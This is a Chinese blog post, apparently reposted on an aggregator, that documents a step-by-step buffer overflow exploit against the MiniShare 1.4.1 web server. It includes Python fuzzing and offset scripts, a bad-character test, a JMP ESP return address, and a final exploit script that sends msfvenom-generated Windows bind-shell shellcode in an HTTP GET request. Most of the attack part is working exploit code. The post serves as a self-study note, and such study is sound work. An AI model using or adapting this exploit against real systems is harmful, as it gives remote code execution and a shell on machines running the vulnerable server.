缓冲区溢出初探之一

Posted whoami101

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了缓冲区溢出初探之一相关的知识,希望对你有一定的参考价值。

业余时间学习了buffer overflow ,简单记录一下操作过程。

文件下载地址:https://www.dropbox.com/s/zhivgb79wtbce37/minishare-1.4.1.exe?dl=0

 

1.模糊测试

目的:发送一定量的数据导致程序崩溃。

#!/usr/share/python
import socket,sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((sys.argv[1],80))
buff="GET "
buff+="A"*2000
buff+=" HTTP/1.1

"
s.send(buff)
s.close()

结果如图所示:看到eip被重写了。 

技术分享图片

 

2.确定eip的位置。 

技术分享图片

技术分享图片

技术分享图片

#!/usr/share/python
import socket,sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((sys.argv[1],80))
buff="GET "
buff+="A"*1787
buff+="BBBB"
buff+="CCCCCCCCCCCCCCCCCCC"
buff+=" HTTP/1.1

"
s.send(buff)
s.close()

技术分享图片

#!/usr/share/python
import socket,sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((sys.argv[1],80))
buff="GET "
buff+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"

buff+=" HTTP/1.1

"
s.send(buff)
s.close()

至此,我们已经看到eip已经被重写了。

3.寻找坏字符

先用一大批的字符去模糊测试,代码如下:

#!/usr/share/python
import socket,sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((sys.argv[1],80))
badchars = ("x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f"
"x20x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
"x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5f"
"x60x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7f"
"x80x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9f"
"xa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbf"
"xc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdf"
"xe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff")
buff="GET "
buff+="A"*1787
buff += "BBBB"
buff += badchars

buff+=" HTTP/1.1

"
s.send(buff)
s.close() 

结果如下:

技术分享图片

0A,00,00,说明在x0d这里被截断,我们吧x0d去掉,然后在测试,全部通过,如图所示:
技术分享图片

说明坏字符只有x0d和x00

 

4.寻找jmp esp

基本上当崩溃发生时我们希望ESP的内容由EIP执行。这意味着我必须让我的EIP跳转到ESP。这可以通过执行JMP ESP指令来实现。我们将打开服务器并在Immunity Debugger中查找包含JMP ESP指令的可执行模块,然后我们将在EIP上覆盖该指令的内存地址。

单击View - Executable modules您将看到可执行模块列表

或者利用mona模块---  !mona jmp -r esp   会在C:Program FilesImmunityIncImmunity Debuggerjmp.txt,如图所示:

技术分享图片

 

我找了其中一个位置:0x77438265

5.生成shellcode

利用msf生成shellcode 加到exp中

#!/usr/share/python

import socket,sys


#msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "x00x0d" -f c
#0x77438265  === x65x82x43x77
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((sys.argv[1],80))
buff="GET "
buff+="A"*1787
buff+="x65x82x43x77"  #address of jmp esp statement form user32.dll
buff+="x90"*20          #20 NOPs are added
buff += ("xb8x63x81xa1x61xdbxc8xd9x74x24xf4x5dx29xc9xb1"
"x53x83xc5x04x31x45x0ex03x26x8fx43x94x54x67x01"
"x57xa4x78x66xd1x41x49xa6x85x02xfax16xcdx46xf7"
"xddx83x72x8cx90x0bx75x25x1ex6axb8xb6x33x4exdb"
"x34x4ex83x3bx04x81xd6x3ax41xfcx1bx6ex1ax8ax8e"
"x9ex2fxc6x12x15x63xc6x12xcax34xe9x33x5dx4exb0"
"x93x5cx83xc8x9dx46xc0xf5x54xfdx32x81x66xd7x0a"
"x6axc4x16xa3x99x14x5fx04x42x63xa9x76xffx74x6e"
"x04xdbxf1x74xaexa8xa2x50x4ex7cx34x13x5cxc9x32"
"x7bx41xccx97xf0x7dx45x16xd6xf7x1dx3dxf2x5cxc5"
"x5cxa3x38xa8x61xb3xe2x15xc4xb8x0fx41x75xe3x47"
"xa6xb4x1bx98xa0xcfx68xaax6fx64xe6x86xf8xa2xf1"
"xe9xd2x13x6dx14xddx63xa4xd3x89x33xdexf2xb1xdf"
"x1exfax67x75x16x5dxd8x68xdbx1dx88x2cx73xf6xc2"
"xa2xacxe6xecx68xc5x8fx10x93xf8x13x9cx75x90xbb"
"xc8x2ex0cx7ex2fxe7xabx81x05x5fx5bxc9x4fx58x64"
"xcax45xcexf2x41x8axcaxe3x55x87x7ax74xc1x5dxeb"
"x37x73x61x26xafx10xf0xadx2fx5exe9x79x78x37xdf"
"x73xecxa5x46x2ax12x34x1ex15x96xe3xe3x98x17x61"
"x5fxbfx07xbfx60xfbx73x6fx37x55x2dxc9xe1x17x87"
"x83x5exfex4fx55xadxc1x09x5axf8xb7xf5xebx55x8e"
"x0axc3x31x06x73x39xa2xe9xaexf9xd2xa3xf2xa8x7a"
"x6ax67xe9xe6x8dx52x2ex1fx0ex56xcfxe4x0ex13xca"
"xa1x88xc8xa6xbax7cxeex15xbax54")

buff+=" HTTP/1.1

"
s.send(buff)
s.close()

  

6.漏洞利用

 

技术分享图片

 


以上是关于缓冲区溢出初探之一的主要内容,如果未能解决你的问题,请参考以下文章

20165315 缓冲区溢出漏洞实验

20165302 缓冲区溢出漏洞实验

20165333 缓冲区溢出漏洞实验

20165318 缓冲区溢出漏洞实验

20199319 缓冲区溢出漏洞试验

缓冲区溢出漏洞实验 20199321